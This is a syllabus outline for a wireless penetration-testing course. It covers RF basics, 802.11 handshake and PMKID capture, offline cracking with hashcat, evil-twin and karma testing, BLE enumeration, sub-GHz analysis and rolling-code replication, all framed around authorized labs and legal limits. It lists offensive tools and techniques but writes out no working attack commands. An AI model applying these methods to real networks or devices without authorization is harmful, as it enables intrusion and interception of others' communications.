Wireless is everywhere and mostly invisible. The course teaches licensed wireless pen testers how to characterize and test the wireless security posture of a client environment -- from RF fundamentals through 802.11, Bluetooth/BLE, sub-GHz, and a five-day simulated wireless engagement capstone.
Course mission and audience
VCA-WIR-101 is the Pentest Track's wireless specialty. Students arrive with networking (NET-101), security principles (SEC-101), and Python tooling (FND-102). They leave able to scope, conduct, and report an authorized wireless engagement.
The audience is students who can read a packet capture, reason about CIA triad, and write Python scripts. They have not worked the RF layer. This course builds RF intuition from first principles and then applies it to a structured engagement methodology.
Position: After NET-101 + SEC-101 + FND-102. Concurrent-eligible with PEN-101 for students who have all prereqs. Gates WIR-201 / RF-201 / RF-301. Pairs with PEN-101 as the offensive-specialty pair in the Pentest Track.
Certification alignment: Students who complete WIR-101 are positioned to sit OffSec OSWP (PEN-210) within two to three months. WIR-101 exceeds OSWP's syllabus (adding Bluetooth/BLE, sub-GHz, and the site-survey/coverage-map deliverable that OSWP does not measure). SANS GAWN covers structurally similar scope at significantly higher cost.
Legal and ethical framing (load-bearing): RF emissions propagate past property boundaries by default. FCC Part 15 permits unlicensed transmit in ISM bands (2.4 GHz, 5 GHz, sub-GHz) within power and interference limits. FCC Part 97 governs amateur radio; the Electronic Communications Privacy Act (ECPA) prohibits intercepting communications outside authorized contexts; the CFAA applies to unauthorized access even when delivered over wireless. Students sign an AUP, maintain per-session authorization logs, and perform all active transmit work on RF-shielded or explicitly authorized equipment. The course is explicitly not "how to crack your neighbor's Wi-Fi."
Foundational anchors
WIR-101 reads paired texts across the signal-and-protocol lifecycle. The anchor pair that gives this track its narrative spine is:
Richard Lyons, Understanding Digital Signal Processing, 3rd ed. (Pearson, 2010; ISBN 978-0-13-702741-5)
Library: /media/laptop/data4t/books-master/Calibre_Library/Richard G. Lyons/Understanding Digital Signal Processing, 3rd Edition (686)/
Lyons's opening: "Digital signal processing has never been more prevalent or easier to perform." Every tool in this course -- RTL-SDR waterfall, hashcat GPU, GNU Radio flowgraph -- sits atop the DSP substrate Lyons builds from first principles. Chapters 1-5 (signals, sampling, aliasing, DFT, FIR/IIR filters) are the WIR-101 assigned reading arc. Chapters 6-10 deepen into the RF-201/RF-301 track.
Wyglinski, Getz, Collins, Pu, Software-Defined Radio for Engineers (Artech House, 2018; ISBN 978-1-63081-457-1; free PDF via Analog Devices)
Library: /media/laptop/data4t/books-master/Calibre_Library/Collins, Getz, Pu, Wyglinski/Software-Defined Radio for Engineers (666)/
Wyglinski bridges the Lyons DSP math to the hardware RF chain (ADC, DAC, IQ sampling, GNU Radio implementation). Chapters 1-4 are Week 1-2 preparation reading; Chapter 5 (SDR implementation) supports Week 9.
Build-it-yourself anchors (free):
Marc Lichtman, PySDR: A Guide to SDR and DSP using Python (pysdr.org; free online) The one-stop entry for SDR + DSP + Python tooling. Runs in the academy workbench via Pyodide. Required for Weeks 1, 9, and the capstone DSP-analysis path.
GNU Radio Tutorials (wiki.gnuradio.org/Tutorials; free) The canonical SDR-flowgraph platform. Week 9 requires building a working BPSK/QPSK flowgraph.
Supplementary:
- Steven W. Smith, The Scientist and Engineer's Guide to DSP (dspguide.com; free) -- older but fundamentals don't age; clearest aliasing and Fourier exposition available for free
- Library:
/media/laptop/data4t/books-master/Calibre_Library/Steven W. Smith/The Scientist and Engineer's Guide to Digital Signal Processing (667)/ - Lyons, Streamlining Digital Signal Processing: Tricks of the Trade, 2nd ed. (Wiley-IEEE, 2012) -- practitioner companion; deepens for RF-201
- Library:
/media/laptop/data4t/books-master/Calibre_Library/Richard G. Lyons/Streamlining Digital Signal Processing_ A Tricks of the Trade Guidebook, 2nd Edition (683)/
Petzold is CSA-101 only. WIR-101's narrative spine is Lyons DSP (structural math) + PySDR (applied tooling). This mirrors the CSA-101 Petzold + nand2tetris pair but for the RF track.
What you will know at the end
Eight outcomes in Bloom's-taxonomy order:
-
Remember. State the four major 802.11 frame types (management / control / data / extension), the WPA/WPA2 four-way-handshake message numbers (M1-M4), the FCC unlicensed-spectrum rules for 2.4 GHz / 5 GHz / sub-GHz ISM, and the difference between SDR receive-only and licensed-transmit operation. (Assessed: midterm closed-book quiz.)
-
Understand. Explain why monitor mode is a hardware-and-driver capability, why antenna gain has direction and polarization, why WPA3-SAE was designed to defeat the offline-cracking attack class, why rolling codes prevent naive replay attacks, and why open guest networks remain a legitimate engagement finding. (Assessed: Week 2 reflection; site-survey lab.)
-
Apply (RF layer). Operate an RF-capable workstation: wireless NIC in monitor mode, antenna selection by use case, regulatory-compliant transmit operation; use RTL-SDR + GQRX to characterize a 433 MHz signal; build a rubber-ducky quarter-wave antenna for a target frequency. (Assessed: Lab 1 + Lab 9.)
-
Apply (802.11 observation). Passively observe 802.11 networks; capture management frames, associations, probe requests, and WPA/WPA2 four-way handshakes; interpret with Wireshark 802.11 dissectors. (Assessed: Lab 2 + Lab 3.)
-
Apply (802.11 attack / defense assessment). Identify security posture (open / WEP / WPA-PSK / WPA2-PSK / WPA3-SAE / 802.1X) of observed networks; conduct authorized handshake capture + PMKID capture + offline cracking with hashcat (mode -m 22000) + wordlist engineering. (Assessed: Lab 4 + Lab 5.)
-
Apply (rogue infrastructure). Identify and test rogue-AP and evil-twin detection mechanisms; build a karma-attack detector; understand hostapd-based rogue-AP setups and EAP credential-capture methodology in authorized lab context. (Assessed: Lab 7.)
-
Apply (BLE + sub-GHz). Survey Bluetooth/BLE behavior (advertising, GATT, pairing modes) with btmon / gatttool / nRF52840 sniffer; survey sub-GHz (315/433/868/915 MHz) with RTL-SDR + HackRF; classify protocols by waveform family using Inspectrum + URH; implement a BPSK/QPSK 3-way handshake in GNU Radio or PySDR; analyze a rolling-code-on-seed garage-door protocol and replicate it against an authorized classroom demonstration device. (Assessed: Lab 8 + Lab 9.)
-
Synthesize / Create. Produce a client-style wireless engagement report: site map, network inventory, per-network + Bluetooth + sub-GHz findings, RF coverage map, remediation. Deliver a 15-minute executive briefing. (Assessed: Capstone.)
The wireless engagement lifecycle
The week sequence follows the wireless-specific engagement lifecycle. PTES phases apply; the wireless-specific additions are the RF reconnaissance phase (passive spectrum survey before active probing) and the regulatory compliance gate (which comes before any active transmit work).
| Phase | Course weeks | What happens |
|---|---|---|
| Pre-engagement + RF regs | Week 1 | RF fundamentals; FCC rules; AUP signing; antenna build |
| 802.11 intelligence gathering | Weeks 2-3 | Frame-level observation; site survey; Kismet; Wireshark |
| Vuln analysis (protocol layer) | Week 4 | Security-mode identification; WEP / WPA / WPA2 / WPA3 / 802.1X |
| Exploitation (cracking + rogue) | Weeks 5 + 7 | Handshake + PMKID capture + offline cracking; evil-twin testing |
| Midterm | Week 6 | Scoped wireless assessment; proctored |
| BLE + sub-GHz recon + RE | Weeks 8-9 | Bluetooth GATT enumeration; sub-GHz protocol recognition; create-your-own-comms; rolling-code replication |
| Coverage + reporting setup | Week 10 | RF coverage maps; interference analysis; engagement report structure |
| Reporting | Week 11 | Report finalization; peer review; executive briefing prep |
| Capstone engagement | Weeks 12-13 | 5-day simulated wireless engagement; report + briefing |
Course shape table
| Week | Topic | Lab |
|---|---|---|
| 1 | RF fundamentals: frequency, modulation, antennas, regulatory (FCC Part 15/97/95) | Lab 1: Rubber-ducky antenna build + SDR characterization |
| 2 | 802.11 architecture: frame types, addressing, management plane, association sequence | Lab 2: Capture + annotate a full 802.11 association |
| 3 | Wireless recon: site survey, Kismet, Wireshark 802.11 dissectors | Lab 3: Full site survey + network inventory |
| 4 | 802.11 security protocols: WEP, WPA-PSK, WPA2-PSK, WPA3-SAE, 802.1X | Lab 4: Security-posture identification of observed networks |
| 5 | WPA/WPA2 handshake capture + PMKID + offline cracking | Lab 5: Crack an instructor-provided handshake |
| 6 | Midterm practical: scoped wireless assessment of lab network | Proctored exam |
| 7 | Rogue APs, evil twins, karma attacks: detection + test methodology | Lab 7: Karma detector build + rogue-AP test |
| 8 | Bluetooth + BLE: pairing modes, GATT, advertising, sniffing | Lab 8: BLE GATT enumeration of 3+ lab devices |
| 9 | Sub-GHz surveys + protocol RE; create-your-own-comms (BPSK/QPSK); rolling-code garage-door | Lab 9: Capture 3 sub-GHz protocols; implement PSK 3-way handshake; rolling-code replication |
| 10 | Engagement methodology: RF coverage maps, interference, spectrum hygiene | Lab 10: Client-style RF coverage survey |
| 11 | Report writing + client communication + ethics of disclosure | Lab 11: Report workshop (draft + peer review) |
| 12-13 | Capstone: 5-day simulated wireless engagement | Report + 15-min executive briefing |
Anchor readings by week
| Week | Required | Optional |
|---|---|---|
| 1 | Lyons Ch 1 (Discrete Sequences + intro); PySDR Ch 1 (IQ Sampling) | Wyglinski Ch 1 (RF fundamentals) |
| 2 | PySDR Ch 9 (Noise and dB) | Wyglinski Ch 2 (ADC/DAC) |
| 3 | PySDR Ch 2 (Frequency Domain) | Smith DSP Ch 8 (The Discrete Fourier Transform) |
| 4 | Lyons Ch 3 (Sampling intro); Wyglinski Ch 3 (Transceiver architectures) | WPA3 Specification (IEEE 802.11-2020 SAE section) |
| 5 | PySDR Ch 3 (Modulation) | Hashcat WPA cracking wiki (hashcat.net) |
| 6 | Review Wks 1-5 | -- |
| 7 | PySDR Ch 4 (OFDM) | Karma attack original research (Heriot-Watt 2004; free) |
| 8 | PySDR Ch 5 (Link budgets) | Bluetooth Core Specification: GAP + GATT overview (free PDF at bluetooth.com) |
| 9 | Lyons Ch 4 (DFT spectrum analysis); Wyglinski Ch 5 (SDR implementation) | URH User Guide (github.com/jopohl/urh) |
| 10 | PySDR Ch 8 (Channel Models) | Site survey methodology (Ekahau training docs; free overview) |
| 11 | Review all findings | -- |
Per-week time budget
| Week | Lecture | Lab | Indep reading | Indep practice | Total |
|---|---|---|---|---|---|
| 1 | 1 hr | 2 hr | 1.5 hr | 1 hr | 5.5 hr |
| 2 | 1 hr | 3 hr | 1.5 hr | 1 hr | 6.5 hr |
| 3 | 1 hr | 4 hr | 1.5 hr | 1 hr | 7.5 hr |
| 4 | 1 hr | 3 hr | 1.5 hr | 1.5 hr | 7 hr |
| 5 | 1 hr | 4 hr | 1 hr | 2 hr | 8 hr |
| 6 | 0.5 hr | 3 hr (midterm) | 1 hr | 1 hr | 5.5 hr |
| 7 | 1 hr | 3 hr | 1 hr | 1.5 hr | 6.5 hr |
| 8 | 1 hr | 4 hr | 1.5 hr | 1 hr | 7.5 hr |
| 9 | 1 hr | 5 hr | 1.5 hr | 2 hr | 9.5 hr |
| 10 | 1 hr | 4 hr | 1 hr | 1.5 hr | 7.5 hr |
| 11 | 1 hr | 3 hr | 1 hr | 2 hr | 7 hr |
| Cap | 0 hr | 22 hr (engagement) | 2 hr | 11 hr (report+briefing) | 35 hr |
| Total | ~10 hr | ~57 hr | ~16 hr | ~26 hr | ~109 hr |
(Matches public-page ~106 hr figure within rounding; lab/indep balance skews lab-heavy per peer-course norms for hands-on wireless courses.)
Lab index
| Lab | Title | Week | Authorized target | Deliverable |
|---|---|---|---|---|
| 1 | RF Fundamentals + Antenna Build | 1 | Instructor-assigned demo signals; RTL-SDR receive only | Hand-built rubber-ducky antenna; SDR spectrum capture |
| 2 | 802.11 Association Sequence | 2 | Instructor-controlled lab AP (authorized) | Annotated PCAP of full association sequence |
| 3 | Site Survey | 3 | Lab space (authorized; no active injection) | Heatmap + network inventory (SSID / channel / BSSID / vendor / RSSI) |
| 4 | Security-Posture Identification | 4 | Same lab networks from Lab 3 | Per-network security-mode classification |
| 5 | WPA/WPA2 Handshake Cracking | 5 | Instructor-provided .cap file (authorized) | Cracked passphrase; hashcat transcript + wordlist archive |
| Midterm | Scoped Wireless Assessment | 6 | Instructor-built lab network | Transcript + one-page finding summary |
| 7 | Karma / Evil-Twin Detection | 7 | Instructor-run rogue AP (authorized lab) | Karma detector code; detection transcript |
| 8 | Bluetooth / BLE Enumeration | 8 | Instructor-placed lab BLE devices | GATT enumeration of 3+ devices; advertising-frame analysis |
| 9 | Sub-GHz + PSK Comms + Rolling Code | 9 | RTL-SDR receive; instructor demo device; authorized BPSK lab channel | 3 classified sub-GHz captures; BPSK 3-way handshake flowgraph; rolling-code analysis report |
| 10 | RF Coverage Survey | 10 | Authorized lab space | Mapped coverage report; interference findings; recommendations |
| 11 | Report Workshop | 11 | Output of Labs 2-10 | Draft engagement report; peer review notes |
| Capstone | 5-Day Simulated Engagement | 12-13 | Instructor-built RF testbed | Engagement report + site map + PCAP archive + briefing deck |
Authorization note: All active transmit work (deauth injection in Lab 5; rogue AP in Lab 7; HackRF TX in Lab 9) is performed on instructor-owned, RF-shielded equipment within an authorized lab environment, under FCC Part 15 power limits or with explicit Part 97 licensed-operator supervision. Students never perform active transmit operations outside the RF-shielded lab.
SDR platform guide
| Platform | Role in course | Spec | Cost |
|---|---|---|---|
| RTL-SDR Blog V4 | Student receive-only SDR; sub-GHz survey workhorse | 500 kHz-1.75 GHz; 8-bit; RX only | ~$40 |
| HackRF One | Program-supplied; transmit-capable; Lab 9 authorized TX | 1 MHz-6 GHz; 8-bit; TX/RX | ~$350 |
| ANTSDR E200 | Advanced platform; program-supplied; Wyglinski labs; Zynq-7020 + AD9363 | 70 MHz-6 GHz; full-duplex MIMO | ~$400 |
| LimeSDR Mini | Advanced alternate; full-duplex; LMS7002M | 10 MHz-3.5 GHz | ~$200 |
| ADALM-PLUTO | Virtual-path emulation; classroom-demo use | 325 MHz-3.8 GHz (ext: 70 MHz-6 GHz) | ~$250 |
Virtual / recorded-capture path: Students without physical SDR hardware complete labs via instructor-provided IQ recordings (.iq / .sigmf format). GNU Radio File Source block + PySDR np.fromfile() loads a recording identically to live hardware. All spectrum-analysis and demodulation labs have a documented virtual-path variant. Transmit labs (Lab 9 TX) can be simulated via GNU Radio's Signal Source + Throttle blocks without any physical hardware.
Toolchain Diary additions (WIR-101)
WIR-101 is the canonical originating course for the RF-track tool corpus. Later courses (RF-201, RF-301, RE-201) reference rather than re-introduce these entries.
- PySDR (in-browser, Pyodide LIVE) -- Marc Lichtman's DSP-and-SDR textbook runs in the academy workbench; no local install required. Canonical RF-track entry.
- GNU Radio Companion (GRC) -- Flowgraph-based DSP/SDR platform; first met Week 9. The in-browser Pyodide subset is in engineering; full GRC is an advanced-track external install.
- GQRX -- Linux/macOS spectrum analyzer and waterfall display; receive-only SDR receiver UI. First met Week 1.
- SDR# / SDR++ -- Cross-platform SDR receiver UIs for Windows and Linux; useful alongside GQRX for quick spectrum checks.
- RTL-SDR Blog V4 + osmocom-rtl-sdr drivers -- Receive-only sub-GHz SDR; the sub-GHz survey workhorse.
- HackRF One + hackrf_transfer + Great Scott Gadgets GRC blocks -- Transmit-capable SDR; program-supplied. Michael Ossmann's "SDR with HackRF" YouTube series is the companion reading.
- ANTSDR E200 -- Advanced lab SDR platform; carries forward into RF-201/RF-301.
- Inspectrum -- Offline IQ file visualization; protocol time-frequency analysis; first met Week 9, deepened in RF-201.
- Universal Radio Hacker (URH) -- Wireless-protocol RE suite; encoding detection; simulation of cryptographic handshakes; 327-protocol auto-identification in URH-NG fork. First met Week 9.
- Alfa AWUS036ACH -- Monitor-mode-capable 802.11ac USB NIC; the practitioner-staple for 802.11 capture.
- aircrack-ng suite (airmon-ng / airodump-ng / aireplay-ng / aircrack-ng) -- 802.11 monitor mode, frame capture, deauth injection (authorized only), offline cracking.
- hcxdumptool + hcxtools -- PMKID and handshake capture toolkit; modern replacement for the old
besside-ngclientless capture workflow. - hashcat (modes -m 22000 WPA-PBKDF2-PMKID+EAPOL) -- GPU-accelerated offline passphrase cracking; mode -m 2500 is deprecated; -m 22000 handles both handshake and PMKID in one format.
- Kismet -- Passive 802.11 wireless detector + sniffer + IDS; site-survey staple. Handles Bluetooth + sub-GHz with appropriate hardware.
- Wireshark with 802.11 / RF dissectors -- Frame-level 802.11 analysis; extends the NET-101 Wireshark introduction for wireless-specific dissection.
- nRF52840 dongle + btmon + gatttool -- Bluetooth/BLE investigation toolset; canonical first-introduce of BLE tooling.
WIR-101-OUTLINE.md v0.1. Week files: week-1.md through week-11.md. Capstone: CAPSTONE.md. Setup: SETUP.md. Instructor: INSTRUCTOR-GUIDE.md.